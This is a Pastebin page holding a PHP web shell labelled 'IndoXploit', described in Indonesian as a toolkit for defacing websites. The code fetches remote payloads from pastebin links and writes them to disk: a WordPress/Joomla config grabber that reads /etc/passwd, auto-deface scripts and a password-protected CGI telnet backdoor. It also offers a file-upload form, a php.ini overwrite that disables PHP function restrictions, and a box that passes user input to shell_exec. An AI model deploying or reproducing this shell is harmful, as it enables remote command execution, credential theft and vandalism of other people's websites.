Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // Tu5b0l3d - IndoXploit
- // thx for you.
- // http://indoxploit.blogspot.co.id/2016/01/simple-tools-for-deface.html
- function parah($pastebin, $nama_file){
- $usa = file_get_contents("$pastebin");
- $frr = fopen("$nama_file", 'w');
- fwrite($frr, $usa);
- }
- $xp = $_GET[xp];
- $b = "Ini merupakan beberapa tool untuk mempermudah dalam hal mendeface ataupun yang lainnya.<br><br>#<br>Tu5b0l3d - IndoXploit";
- if($xp == "config_grabber_wp_jm"){
- $config = parah("http://pastebin.com/raw.php?i=deH5eAqP", "config_wp_jm_grabber.php");
- $b = '<h2><a href="config_wp_jm_grabber.php" target="_blank">Config Grabber Wordpress dan joomla</a></h2><br>
- tool ini pertama ambil user dari /etc/passwd, kemudian cek apakah user Readable atau tidak, jika readable Maka akan diambil confignya';
- }
- elseif($xp == "just_jumping"){
- $jump = parah("http://pastebin.com/raw.php?i=eewrEsJY", "just_jumping.php");
- $b = '<h2><a href="just_jumping.php" target="_blank">Just Jumping</a></h2><br>
- tool jumping ini cuma melihat apakah user readable atau tidak menggunakan fungsi is_readable, jika readable, maka ditampilkan, <br>dan juga nama domainnya akan ditampilkan untuk mempermudah memakai tools yang lainnya.';
- }
- elseif($xp == "pepes_joomla"){
- $pepes_joomla = parah("http://pastebin.com/raw.php?i=50NQdet2", "pepes_joomla.php");
- $b = '<h2><a href="pepes_joomla.php" target="_blank">Auto Deface site cms Joomla</a></h2><br>
- tool ini bisa untuk auto deface jika ente tau nama sitenya, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
- video: <a href="https://youtu.be/clvLy5pDA2I" target="_blank">tonton</a>';
- }
- elseif($xp == "pepes_wp"){
- $pepes_wp = parah("http://pastebin.com/raw.php?i=uQWCGPMS", "pepes_wp.php");
- $b = '<h2><a href="pepes_wp.php" target="_blank">Auto Deface site cms Wordpress</a></h2><br>
- tool ini bisa untuk auto deface site berCMS Wordpress, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
- video: <a href="https://youtu.be/tWEcMuiqKlo" target="_blank">tonton</a>';
- }
- elseif($xp == "pepes_wp2"){
- $pepes_wp2 = parah("http://pastebin.com/raw.php?i=4rZfJaqE", "pepes_wp2.php");
- $b = '<h2><a href="pepes_wp2.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
- Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';
- }
- elseif($xp == "link_title"){
- $link_title = parah("http://pastebin.com/raw.php?i=u69dMjH9", "link_title.php");
- $b = '<h2><a href="link_title.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
- Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';
- }
- elseif($xp == "cgi"){
- $dir = mkdir('cgi', 0777);
- $cgi = parah("http://pastebin.com/raw.php?i=XTUFfJLg", "cgi/anu.izo");
- $acces = "AddHandler cgi-script .izo";
- $frr2 = fopen('cgi/.htaccess', 'w');
- fwrite($frr2, $acces);
- chmod("cgi/anu.izo", 0755);
- $b = '<h2><a href="cgi/anu.izo" target="_blank">CGI Telnet</a></h2><br>
- password = indoXploit<br>it\' powerfull, source: <a href="http://www.rohitab.com/cgi-telnet" target="_blank">Rohitab.com</a>';
- }
- elseif($xp == "upload"){
- if($_POST['v']){
- if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
- $b = "<b>berhasil</b>-->".$_FILES["f"]["name"];
- }else{
- $b = "<b>gagal</b>";
- }
- }
- else{
- $b = "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
- }
- }
- elseif($xp == "bypass"){
- $dir = getcwd();
- $isi = 'safe_mode = off
- disable_functions = NONE
- ';
- $buka = fopen($dir.'/php.ini', 'w');
- fwrite($buka, $isi);
- $b = '<h2><a href="php.ini" target="_blank">Bypass Disabled Functions</a></h2><br>
- klik link tsb.';
- }
- elseif($xp == "command"){
- session_start();
- if(empty($_SESSION["dir"]))$_SESSION["dir"]="./";
- $a = '<textarea rows="10" cols="100">';
- if(isset($_POST['command'])){
- isset($_SESSION["dir"])?chdir($_SESSION["dir"]):null;
- $cmd=trim($_POST['command']);
- if(preg_match("/^cd\s/i",$cmd)){
- $pecah=explode(" ",preg_replace("/\s+/"," ",$cmd));
- if(@chdir($pecah[1])){
- $n="directory changed to $pecah[1]";
- $_SESSION["dir"].=$pecah[1]."/";
- }
- else $n="error cd";
- }else $n=shell_exec($_POST['command']);
- }else $n='';
- $c = "</textarea>";
- $b = $a.$n.$c;
- }
- echo '<!DOCTYPE html>
- <html>
- <head>
- <title>IndoXploit</title>
- <style>
- a{
- text-decoration: none;
- }
- a:hover{
- color: red;
- }
- .kotak{
- border: 1px solid grey;
- width: 200px;
- height: 20px;
- text-align: center;
- border-radius: 3px;
- float: left;
- margin-right: 5px;
- }
- .kotak:hover{
- border: 1px solid red;
- }
- #com{
- margin-right: 70px;
- float: left;
- }
- </style>
- </head>
- <body>
- <center><h2>Simple Tools by Indo<font color="red">}{</font>ploit</h2></center><hr>
- <div class="kotak"><a href="?xp=just_jumping">Just Jumping</a></div>
- <div class="kotak"><a href="?xp=config_grabber_wp_jm">Config Grabber WP dan Joomla</a></div>
- <div class="kotak"><a href="?xp=pepes_joomla">Auto Deface site cms joomla</a></div>
- <div class="kotak"><a href="?xp=pepes_wp">Auto Deface site Wordpress</a></div>
- <div class="kotak"><a href="?xp=pepes_wp2">Auto Deface site Wordpress 2</a></div>
- <div class="kotak"><a href="?xp=link_title">Title site Wordpress</a></div>
- ';
- echo "<br><br><br>$b<br><br><br><br><hr>
- </body>
- </html>";
- if(@ini_get("disable_functions")){
- echo "Disabled Functions = <font color='red'>".@ini_get("disable_functions")."</font>";
- }else{
- echo "Disable Functions = None";
- }
- if(@ini_get("safe_mode")){echo "<br><br>Safe Mode = <font color='red'>ON<br><br>";}else{ echo "<br><br>Safe Mode = OFF<br><br>";}
- $kernel = shell_exec("uname -a");
- echo "Kernel: <font color='red'>$kernel<br><br>";
- echo '<div class="kotak"><a href="?xp=bypass">Bypass disabled Functions</a></div> <div class="kotak"><a href="?xp=cgi">CGI Telnet</a></div><div class="kotak"><a href="?xp=upload">Upload File</a></div><br><br>';
- echo '<div id="com"><form method="post" action="?xp=command"><input type="text" name="command" placeholder="Command"><input type="submit" value="Go!"></div>';
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement